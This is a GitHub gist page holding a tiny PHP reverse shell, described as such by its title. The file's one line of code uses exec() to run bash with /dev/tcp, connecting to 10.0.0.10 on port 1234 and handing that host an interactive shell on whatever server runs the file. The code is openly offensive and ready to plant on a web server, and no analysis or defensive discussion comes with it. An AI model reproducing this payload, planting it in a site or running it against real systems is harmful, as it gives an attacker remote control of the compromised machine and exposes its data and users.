Skip to content

Instantly share code, notes, and snippets.

@Rudis1261
Forked from rshipp/shell.php
Created March 3, 2022 11:00
Show Gist options
  • Save Rudis1261/d59156a8f93b47266c7549e8bf50196c to your computer and use it in GitHub Desktop.
Save Rudis1261/d59156a8f93b47266c7549e8bf50196c to your computer and use it in GitHub Desktop.
A tiny PHP/bash reverse shell.
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment